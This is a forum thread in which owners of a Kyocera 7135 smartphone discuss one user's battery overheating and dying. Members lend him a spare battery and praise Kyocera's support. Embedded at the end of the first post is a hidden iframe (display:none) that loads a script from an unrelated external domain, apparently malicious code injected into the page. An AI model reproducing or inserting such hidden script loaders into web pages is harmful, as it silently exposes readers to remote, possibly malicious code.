+ Reply to Thread
Page 1 of 2 1 2 LastLast

Battery meltdown!!!

Last night I was watching TV, with my 7135 in it's usual place in my t-shirt pocket, and I grabbed it to play with during the commercial and it was burning hot! (it had been just fine 10 minutes earlier!). I opened it up and the Launch 'Em battery % meter was counting down a couple % every 2-3 seconds! So I quickly turned it off and took the battery out. After 60-90 minutes the battery was still hot enough to practically burn your hand. After it was back to normal temps I put the battery back in, but it was dead. The 7135 still works fine when plugged into a wall or car charger, but that's it

I just got off the phone with Kyocera. The dude said it sounded like a "chemical reaction" inside the battery. So I should get a call in a few hours and they will decide whether to replace the battery, or the whole phone. It does appear to be just the battery blowing up, so I don't plan to push for more than a replacement battery... as long as I'm assured that if I experience anything else unusual (as a possible result of heat damage to the 7135) they will replace the whole thing.

But in the meantime it looks like I'm going to have to spend this weekend (at least) without use of my 7135, except when connected to a charger (and even then I have to restore from backup buddy because there is no way for it to retain my data!) :bawling

This sucks... my weekend is ruined before it has even started!!! :anger<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

Re: Battery meltdown!!!

Originally posted by Robert K.
    This sucks... my weekend is ruined before it has even started!!! :anger
    Another reason I'm glad I got the spare battery. A whole weekend.... I couldn't stand it.
    If at first you don't succeed, don't try sky diving.

Re: Re: Battery meltdown!!!

Originally posted by Steve B.
    Another reason I'm glad I got the spare battery. A whole weekend.... I couldn't stand it.
    Yeah... tell me about it. It never occurred to me to get a spare battery for a reason like this though! I'm 100% sure that I won't be caught spare battery-less if this happens again! I'll probably order one today.......... but that doesn't do me a lot of good for this weekend.

OUCH!

Yeah... tell me about it. It never occurred to me to get a spare battery for a reason like this though! I'm 100% sure that I won't be caught spare battery-less if this happens again! I'll probably order one today.......... but that doesn't do me a lot of good for this weekend.
    I would call Kyo back and have them Fedex the replacement for Saturday delivery, even if I had to pick up the shipping charges. Also, you might want to call the local VZW store and see if they have batteries in. The charger and some other accesories that can be used by multiple phones already say "7135" on them, it is always possible they have started receiving accesories prior to the upcoming release.

(if you can get over to the East side of the county before 5:00, I could loan you my spare, but I am going into DC for a friends birthday party this evening)

Alan

Re: OUCH!

Originally posted by alanb
    I would call Kyo back and have them Fedex the replacement for Saturday delivery, even if I had to pick up the shipping charges. Also, you might want to call the local VZW store and see if they have batteries in. The charger and some other accesories that can be used by multiple phones already say "7135" on them, it is always possible they have started receiving accesories prior to the upcoming release.

(if you can get over to the East side of the county before 5:00, I could loan you my spare, but I am going into DC for a friends birthday party this evening)

Alan
    Thanks for the tips Alan. I thought about the Saturday delivery, and just paying whatever it costs... but I leave for an all day road trip to VA tomorrow and wouldn't be able to get it until Sunday (if that's even possible). I will call the VZ store to see if they have anything.

Hmmm... where exactly is the east side?

But in the meantime it looks like I'm going to have to spend this weekend (at least) without use of my 7135, except when connected to a charger (and even then I have to restore from backup buddy because there is no way for it to retain my data!) :bawling

If you want to stop by my place today or tomorrow, you can borrow my spare battery (provided you don't stick it in the oven!)
    Dave

Look on the bright side. Some of us still have to spend EVERY weekend, and every weekday for that matter, without the use of a 7135!
    The 7135 is a marathon, not a Sprint

Have I mentioned lately how much I love this place???

I'm back up and running with a good battery, thanks to Alan B.! :clap Being the great guy that he is, he was kind enough to help a 7135 brother out and loan me his spare battery! It was a nice 25 minute drive each way, and I was back in business by lunchtime

Thank you VERY much Alan... I appreciate it, my 7135 appreciates it... and my weekend has been SAVED!!! (ok, I still would've had a reason to live without use of my 7135... but it just ain't the same! ).

And a very special thanks also to Dave for his very generous offer to loan me his spare battery! You da man Dave! :clap

You can bet that I myself will also have a spare battery if anything like this ever happens again (going to Kyo's site to order it NOW!!!)

The way I see it, this is what user communities are all about. If we aren't here to help each other, we are just wasting bandwidth...

Alan

Originally posted by alanb
    The way I see it, this is what user communities are all about. If we aren't here to help each other, we are just wasting bandwidth...

Alan
    True

And of course it helps having so many 7135 owners in the same location!

Originally posted by Rambler
    And of course it helps having so many 7135 owners in the same location!
    Imagine how great it will be when Verizon finally releases it.

you are right, this is a great forum.

That said, anyone have a spare 7135 they could loan me? I would only need it until (hopefully next week)
    Walt

Originally posted by Beryl
    Imagine how great it will be when Verizon finally releases it.
    Speaking of GREAT... I just got off the phone with Kyocera tech support a little while ago. They were calling me back in reference to the trouble ticket that was initiated by my call to them this morning. The dude I spoke with (Daniel) was very friendly and helpful. I didn't even have to give him the details of my situation......... because he had already read about it here in this thread before calling me! (he said that they frequently check out our posts on SPS).

Anyway, he said that they have not had any reports of such a problem, and that he wanted me to ship back to them all of my equipment so that they can try to determine the exact cause of the problem (they even want my car charger so they can investigate all of the possibilities). So today they are sending me a new 7135 and a new car charger, and on Monday when I get them I am going to send them my equipment for testing. They were even going to attempt to get it to me tomorrow morning because they saw in my post that I was going to be "out of town"! (but I'm leaving too early for it to matter).

I just wanted to let you all know about this example of excellent customer service by Kyocera's tech support group! It should give all of us who have (or will) invest big $$$ in the 7135 some added confidence that we are definitely making a wise decision, and that Kyocera is backing us 100% in their support of this awesome smartphone! :clap (that, along with my Verizon insurance, will certainly help me sleep at night! )

Wow! Way to go Kyocera Customer Service!

Won't it be nice when we can just drive to our local VZW outlet for accessories?

...and our local Sprint store! spin

I'm impressed by this level of Customer Service.

Given the limited release of the phone, frankly, I think Kyocera would do well treat all of us early adopters as beta testers. We paid full price for a device without asking for any benefits outside of what we gain from the product itself. You'd think that they would be quick to replace any failing devices and offering us the opportunity to test add-ons.

And a very special thanks also to Dave for his very generous offer to loan me his spare battery! You da man Dave! :clap
    We gotta stick together. We are the D.C. Kyo Krazies. We have our reputation to uphold!
    Dave

Originally posted by dwdod
    We gotta stick together. We are the D.C. Kyo Krazies. We have our reputation to uphold!
    Yep! DC is the "Nations Capital"..... but it's also the "Kyo Kapital" of the USA

I ordered my spare battery as soon as I got back to my office..... talk about learning a lesson the hard way!!! Fortunately my buddies had my back The only downside to all of this I can think of is that I finally got a SE screen protector on with no bubbles and no streaks!!! Now all of that effort was for nothing... lol, j/k :p I did figure out the secret to no bubbles/streaks application though........... get it on pretty good, and then with a damp (and soft) paper towel rub the screen with a bit a pressure. I was just trying to clean the screen protector... but ended up making it look like I didn't even have one on there

Originally posted by Beryl
    I'm impressed by this level of Customer Service.

Given the limited release of the phone, frankly, I think Kyocera would do well treat all of us early adopters as beta testers. We paid full price for a device without asking for any benefits outside of what we gain from the product itself. You'd think that they would be quick to replace any failing devices and offering us the opportunity to test add-ons.
    You've got a good point there Beryl. Presumably the need for support from Kyocera will increase very dramatically when the 7135 is released by Verizon... and the knowledge they gain now from true "real world" testing could save them a lot of headaches later. And this kind of "above and beyond" support, like what I received today, will also keep "bleeding edge" types like us coming back for more (lol... as if we need any encouragement :p).

Thanks again for the great support Kyocera! :clap